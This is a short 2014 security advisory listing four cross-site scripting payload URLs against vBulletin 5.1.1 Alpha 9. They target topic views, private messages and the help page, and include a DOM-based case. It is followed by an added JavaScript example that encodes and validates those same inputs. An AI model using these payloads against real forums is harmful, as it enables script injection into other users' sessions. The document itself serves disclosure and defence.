
vBulletin 5.1 Cross Site Scripting

Posted on 19 April 2014

Exploit Title: vBulletin 5.1 Multiple XSS vulnerabilities
Authors: Romanian Security Team
Website: https://rstforums.com/forum/
Date published: 19 April 2014
Software: vBulletin
Version: 5.1.1 Alpha 9

[XSS] Random topic - https://website.com/[forum_path]/forum/anunturi-importante/rst-power/67030-rst-admin-restore?view=stream1337";alert(123);//

[XSS] New private message - https://website.com/[forum_path]/privatemessage/new/9999"><input onfocus=alert(1) autofocus>

[XSS] View PM: you must know or bruteforce private message ID (830372) - https://website.com/[forum_path]/privatemessage/view/830372?folderid=random";alert(1);//

[DOM XSS] Help - https://website.com/[forum_path]/help#'"><img src=x onerror=prompt("PoC")>

(c) Romanian Security Team 2014
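The values listed above break out of two output contexts: a quoted JavaScript string (`";...//`) and a quoted HTML attribute (`">`). The following is an added example, not code from the advisory or from vBulletin, showing context-specific encoding and allowlist validation applied to those same values. The function names, the rendered markup, and the assumption that message and folder ids are numeric are hypothetical.

```javascript
// Added example, not vBulletin code: all function names here are hypothetical.

// Encode a value for placement inside a quoted JavaScript string literal.
// Everything outside [A-Za-z0-9] becomes \uXXXX, so quotes, semicolons,
// slashes and "</script>" cannot terminate the literal or the script block.
function encodeForJsString(value) {
  let out = '';
  for (const unit of String(value).split('')) { // UTF-16 code units
    out += /[A-Za-z0-9]/.test(unit)
      ? unit
      : '\\u' + unit.charCodeAt(0).toString(16).padStart(4, '0');
  }
  return out;
}

// Encode a value for placement inside a quoted HTML attribute or element body.
function encodeForHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Strict allowlist for a message or folder id (assumed numeric here).
function parseNumericId(value) {
  return /^[0-9]{1,10}$/.test(String(value)) ? Number(value) : null;
}

// Parameter values taken from the advisory, used as test input.
const samples = {
  view: 'stream1337";alert(123);//',
  pmId: '9999"><input onfocus=alert(1) autofocus>',
  folderid: 'random";alert(1);//',
  helpFragment: '\'"><img src=x onerror=prompt("PoC")>',
};

// Render each value into the context it was assumed to reach.
function render() {
  return {
    script: 'var view = "' + encodeForJsString(samples.view) + '";',
    attr: '<input name="to" value="' + encodeForHtml(samples.pmId) + '">',
    folder: parseNumericId(samples.folderid), // rejected: not numeric
    help: encodeForHtml(samples.helpFragment),
  };
}
```

For the DOM case, writing the fragment with `textContent` instead of building markup avoids the need for HTML encoding on the client.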

 
